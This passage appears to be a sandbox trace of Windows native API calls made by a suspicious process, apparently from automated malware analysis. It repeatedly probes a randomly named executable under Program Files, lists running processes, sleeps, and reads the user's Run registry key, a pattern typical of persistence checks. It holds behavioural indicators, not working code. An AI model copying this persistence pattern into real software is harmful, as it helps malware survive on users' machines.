IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.576] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0293.576] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.576] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.576] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0293.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0293.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0293.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0293.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0293.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0293.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0293.712] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0293.714] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0293.715] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0293.715] NtClose (Handle=0x338) returned 0x0 [0293.715] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.715] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.715] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de220) returned 1 [0293.715] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.715] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.715] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0293.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0293.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0293.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0293.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0293.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0293.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0293.847] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0293.849] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0293.850] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0293.850] NtClose (Handle=0x338) returned 0x0 [0293.850] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.850] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.850] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0293.850] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.850] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.850] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0293.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0293.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0293.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0293.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0293.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0293.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0293.961] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0293.962] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0293.962] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0293.963] NtClose (Handle=0x338) returned 0x0 [0293.963] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.963] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.963] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0293.963] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.963] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.963] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0293.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0293.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0293.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0293.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0293.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0294.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0294.089] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0294.091] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0294.093] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0294.093] NtClose (Handle=0x338) returned 0x0 [0294.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.093] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.093] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de1a0) returned 1 [0294.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.093] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.093] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de1a0) returned 1 [0294.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0294.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0294.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0294.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0294.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0294.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0294.243] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0294.245] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0294.246] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0294.246] NtClose (Handle=0x338) returned 0x0 [0294.246] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.246] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.247] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0294.247] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.247] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.247] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0294.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0294.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0294.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0294.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0294.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0294.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0294.398] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0294.400] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0294.401] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0294.401] NtClose (Handle=0x338) returned 0x0 [0294.401] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.401] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.401] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0294.401] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0294.401] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0294.402] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0294.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0294.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0294.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0294.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0294.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0294.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 